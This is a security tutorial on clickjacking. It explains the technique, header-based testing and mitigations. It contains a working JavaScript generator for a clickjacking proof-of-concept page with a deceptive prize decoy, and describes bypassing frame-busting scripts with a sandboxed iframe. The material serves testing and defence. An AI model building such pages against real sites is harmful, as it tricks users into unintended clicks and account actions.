Click Jacking
aka: UI Redressing
This is an attack in which the victim is tricked into clicking something other than what they believe they are clicking. Occasionally the clicked resource is simply swapped, but the usual technique is a hidden clickable layer: either a transparent frame placed over the page that silently steals the click, or an opaque, innocuous decoy (such as a video play button) through which the click falls to the framed element hidden behind it. The layers are positioned and hidden with the CSS opacity and z-index properties.
For the malicious cover-page method the target page must be able to be loaded in an iframe.
Test this by loading the target in an iframe on a page you control: if it renders inside the frame, click jacking is possible. Watching the HTTP response headers while testing helps debug a failed load, since X-Frame-Options or a Content-Security-Policy frame-ancestors directive will stop the iframe from rendering (the browser console also logs why a frame was refused).
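A header-based version of that check, added here as an example and not part of the original notes: given a target's response headers, decide whether a page on the attacker's origin may frame it. The origins and header sets are constructed for illustration; the rules encode how current browsers treat the two headers (frame-ancestors overrides X-Frame-Options, ALLOW-FROM is ignored, an absent header leaves the page frameable).

```javascript
// Added example: decide from a target's response headers whether a page on
// ATTACKER_ORIGIN may load it in an iframe. Nothing here is a real site.
const ATTACKER_ORIGIN = 'https://attacker.example'; // assumed attacker origin

// Pull the source list of the frame-ancestors directive out of a CSP value.
// Returns null when the directive is absent (an empty list means 'none').
function frameAncestors(csp) {
  for (const directive of csp.split(';')) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === 'frame-ancestors') return tokens.slice(1);
  }
  return null;
}

// Does one frame-ancestors source expression permit `origin` to frame a
// document served from `targetOrigin`?
function sourceMatches(src, origin, targetOrigin) {
  const s = src.replace(/^'|'$/g, '').toLowerCase();
  if (s === 'none') return false;
  if (s === '*') return true;
  if (s === 'self') return origin === targetOrigin;
  const o = new URL(origin);
  // scheme-only source, e.g. "https:"
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return o.protocol === s;
  // host source: [scheme://][*.]host[:port|:*]
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?$/);
  if (!m) return false;
  const [, scheme, wild, host, port] = m;
  if (scheme && scheme + ':' !== o.protocol) return false;
  const hostOk = wild ? o.hostname.endsWith('.' + host) : o.hostname === host;
  if (!hostOk) return false;
  const originPort = o.port || (o.protocol === 'https:' ? '443' : '80');
  if (port && port !== '*' && port !== originPort) return false;
  return true;
}

// Main check. Header names are matched case-insensitively.
function isFrameable(headers, targetOrigin, attackerOrigin = ATTACKER_ORIGIN) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  // A frame-ancestors directive wins over X-Frame-Options when both exist.
  // (Content-Security-Policy-Report-Only is deliberately ignored: it reports,
  // it does not block.)
  const fa = h['content-security-policy'] ? frameAncestors(h['content-security-policy']) : null;
  if (fa) return fa.some(src => sourceMatches(src, attackerOrigin, targetOrigin));
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return attackerOrigin === targetOrigin;
  // ALLOW-FROM is not honoured by current browsers; an absent or malformed
  // value leaves the page frameable.
  return true;
}

// Constructed sample standing in for a captured response.
const sample = { 'Content-Type': 'text/html', 'X-Frame-Options': 'SAMEORIGIN' };
console.log('frameable:', isFrameable(sample, 'https://target.example')); // false
```

Run it against the headers you captured from the target (a `curl -I` of the target URL is enough); a `true` result is the cue to build the cover page.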
Page layering:
Use opacity and z-index to layer the HTML. An example pair of settings might look like:
Layer 1 (the iframed target, on top): z-index: 1; opacity: 0.2; and Layer 2 (the decoy page underneath): z-index: -1;. In a real attack the opacity would be 0; 0.2 is only useful while lining the layers up, so that both are visible at once.
The inverse is also possible, depending on the click jack relationship we want to abuse: put the opaque decoy on top and give it pointer-events: none so that clicks pass through it to the frame underneath.
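The layering above as a small generator for a proof-of-concept page, added here as an example and not code from the original notes. The target URL, the button's coordinates inside the target page and the decoy's position are assumptions; the script computes the negative frame offsets that put the target's button exactly under the decoy, and it also covers the inverse arrangement (decoy on top with pointer-events: none).

```javascript
// Added example: build a clickjacking PoC page. Every URL and coordinate is
// an assumption for illustration.
function buildPoc({ target, buttonX, buttonY, opacity = 0, decoyLabel = 'Play video', decoyOnTop = false }) {
  // Where the decoy is drawn on the attacker page (assumed coordinates).
  const decoyX = 200, decoyY = 150;
  // Shift the frame by negative offsets so the target's button (at
  // buttonX/buttonY inside the target page) lands exactly under the decoy.
  const left = decoyX - buttonX;
  const top = decoyY - buttonY;
  // Default: transparent frame on top, decoy beneath (layer 1 / layer 2 in
  // the notes). Inverse: opaque decoy on top with pointer-events: none so
  // clicks pass through it to the visible frame beneath.
  const frameCss = decoyOnTop ? 'z-index: 1; opacity: 1;' : `z-index: 1; opacity: ${opacity};`;
  const decoyCss = decoyOnTop ? 'z-index: 2; pointer-events: none;' : 'z-index: -1;';
  return `<!doctype html>
<html><head><meta charset="utf-8"><title>You won a prize</title>
<style>
  body { margin: 0; }
  #decoy { position: absolute; left: ${decoyX}px; top: ${decoyY}px; ${decoyCss} }
  #target { position: absolute; left: ${left}px; top: ${top}px;
            width: 1200px; height: 900px; border: 0; ${frameCss} }
</style></head>
<body>
  <button id="decoy">${decoyLabel}</button>
  <iframe id="target" src="${target}" scrolling="no"></iframe>
</body></html>`;
}

// Usage: node poc.js > poc.html, then open poc.html in a browser.
// opacity 0.2 is the tuning setting; drop it to 0 once the layers line up.
if (typeof require !== 'undefined' && require.main === module) {
  process.stdout.write(buildPoc({
    target: 'https://target.example/settings', // assumed target page
    buttonX: 640, buttonY: 420,                // assumed position of its button
    opacity: 0.2,
  }));
}
```

With the iframe shifted by (left, top) = (decoyX - buttonX, decoyY - buttonY), the point (buttonX, buttonY) of the framed page is drawn at (decoyX, decoyY) on the attacker page, which is exactly where the decoy button sits; scrolling="no" stops the victim from moving the alignment.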
Mitigations:
There are many methods that have been used over the years. The list below is in approximate order of preference for mitigating the threat. Combining the headers with a frame-breaker is the best solution: the headers are enforced by the browser, and the script only covers clients that ignore them.
Content-Security-Policy: frame-ancestors 'none' (or 'self', or an explicit list of allowed origins). Supported by all current browsers and takes precedence over X-Frame-Options when both are present.
HTTP X-Frame-Options: DENY or SAMEORIGIN. The older header, still worth sending for legacy clients; the ALLOW-FROM value is no longer honoured by modern browsers.
Browser frame-breaker
Embedded JavaScript iframe escape in the page (a frame-busting script), as defence in depth only.
As a further caveat, session cookies marked SameSite=Lax or Strict are not sent to a cross-site iframe, which limits what an attacker gains from framing the target even where framing itself is allowed.
Mitigation circumvention:
If the embedded JavaScript iframe killer is the only method used, the attacker's site can defeat it: loading the target in an iframe with a sandbox attribute that omits allow-top-navigation (for example sandbox="allow-forms allow-scripts") makes the script's top.location assignment fail, so the page stays framed, and earlier scripts were also beaten with double framing and onbeforeunload tricks. The X-Frame-Options and frame-ancestors headers cannot be bypassed this way, because the browser refuses to render the frame at all.
Common Clickjack Activities:
Likejacking: clickjacking a Facebook Like button so that the victim unknowingly likes a page.
Cursorjacking: displaying a fake cursor offset from the real one, so that the victim's clicks land somewhere other than where the visible cursor appears to be.